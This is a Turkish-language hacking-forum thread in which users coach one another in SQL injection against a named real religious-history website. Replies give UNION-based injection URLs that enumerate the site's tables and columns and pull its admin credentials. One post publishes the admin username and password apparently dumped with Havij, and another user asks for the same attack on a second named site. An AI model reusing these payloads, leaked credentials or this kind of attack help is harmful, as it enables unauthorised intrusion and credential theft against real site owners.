sql injection ile ilgili

nedeyon

kusura bakmayın nereye açıcağımı bilemedim.sql ile ilgili sorum var. http://www.bible-history.com/subcat.php?id=2 bu sitede ' koyuyorum hata veriyor fakat columları...

kusura bakmayın nereye açıcağımı bilemedim.sql ile ilgili sorum var.
http://www.bible-history.com/subcat.php?id=2
bu sitede ' koyuyorum hata veriyor fakat columları alamıyorum.order by 2-- yapıyorum Query failed : Unknown column '2' in 'order clause' hatası alıyorum order by 1-- yapınca site sayfası açılıyor bu 1 tane mi colum var demek anlamadım.union all select 1-- yapıyorum 1
Query failed1: The used SELECT statements have a different number of columns diyor yani column sayısı 1 değil yardıcmı olabilir misiniz?çok minnettar olurum.
 
Merhaba Havij Programını Kullan

Site Bilgileri Aşağıda Paneli Bul Gir. :)

Data Found: admin_id=1
Data Found: admin_username=jc
Data Found: admin_password=Mos3s
 
Son düzenleme:
Başka sitelere yönel Sql açığı öok olan bir açıktır.Ama Her açık Hacklencek diye bir şey yok
 
Dostum, sitede 1 tane column var onun uzerinden gideceksin.
http://www.bible-history.com/subcat...schema.tables+where+table_schema=database()--

tablo isimlerini bu sekilde aldiktan sonra orda "administrators" isminde bir tabloyla karsilasacaksin. Bunu bir yere not et. Ardindan,

http://www.bible-history.com/subcat...chema.columns+where+table_schema=database()--

column isimlerini bu sekilde aldiktan sonra orda da gozune "admin_username,admin_password" kisimlari carpacaktir. Onlardanda veriyi su sekilde cekeceksin:
http://www.bible-history.com/subcat...2722f3e,admin_password)+from+administrators--
 
tarxes' Alıntı:
Dostum, sitede 1 tane column var onun uzerinden gideceksin.
http://www.bible-history.com/subcat...schema.tables+where+table_schema=database()--

tablo isimlerini bu sekilde aldiktan sonra orda "administrators" isminde bir tabloyla karsilasacaksin. Bunu bir yere not et. Ardindan,

http://www.bible-history.com/subcat...chema.columns+where+table_schema=database()--

column isimlerini bu sekilde aldiktan sonra orda da gozune "admin_username,admin_password" kisimlari carpacaktir. Onlardanda veriyi su sekilde cekeceksin:
http://www.bible-history.com/subcat...2722f3e,admin_password)+from+administrators--
Genişletmek için tıklayın ...
oo çok sağol benim çok ekmek yemem lazım
 
Ayrica, havij degil sqlmap kullanirsan daha saglikli sonuclar alirsin :)
 
tarxes' Alıntı:
Dostum, sitede 1 tane column var onun uzerinden gideceksin.
http://www.bible-history.com/subcat...schema.tables+where+table_schema=database()--

tablo isimlerini bu sekilde aldiktan sonra orda "administrators" isminde bir tabloyla karsilasacaksin. Bunu bir yere not et. Ardindan,

http://www.bible-history.com/subcat...chema.columns+where+table_schema=database()--

column isimlerini bu sekilde aldiktan sonra orda da gozune "admin_username,admin_password" kisimlari carpacaktir. Onlardanda veriyi su sekilde cekeceksin:
http://www.bible-history.com/subcat...2722f3e,admin_password)+from+administrators--
Genişletmek için tıklayın ...
bu siteyide yapabilirmisin? http://www.hebron.com/english/gallery.php?id=170'
 
Yanıt için giriş yapmanız veya üye olmanız gerekir.
131,740Konular
3,270,892Mesajlar
316,055Kullanıcılar
reggonSon Üye

About Us & Legal Notice

Yasal Uyarı: spyhackerz.org, 5651 sayılı Kanun kapsamında “Yer Sağlayıcı”dır. Sitedeki içerikler, X, Instagram ve Facebook’ta olduğu gibi, ön onay olmadan tamamen kullanıcılar tarafından paylaşılır. Bu nedenle spyhackerz.org, kullanıcı içeriklerini veya hukuka aykırı paylaşımları izlemek, denetlemek ve araştırmakla yükümlü değildir. Site bünyesinde herhangi bir “saldırı ekibi” bulunmamaktadır ve Türkiye’deki internet sitelerine yönelik zararlı faaliyet yürütülmez. SPYHACKERZ, üyelerin bireysel olarak gerçekleştirdiği hacking içerikli forum faaliyetlerinden sorumlu değildir. spyhackerz.org adı kullanılarak bir saldırı yapılması halinde tüm sorumluluk yalnızca ilgili üyeye aittir.
Üst Alt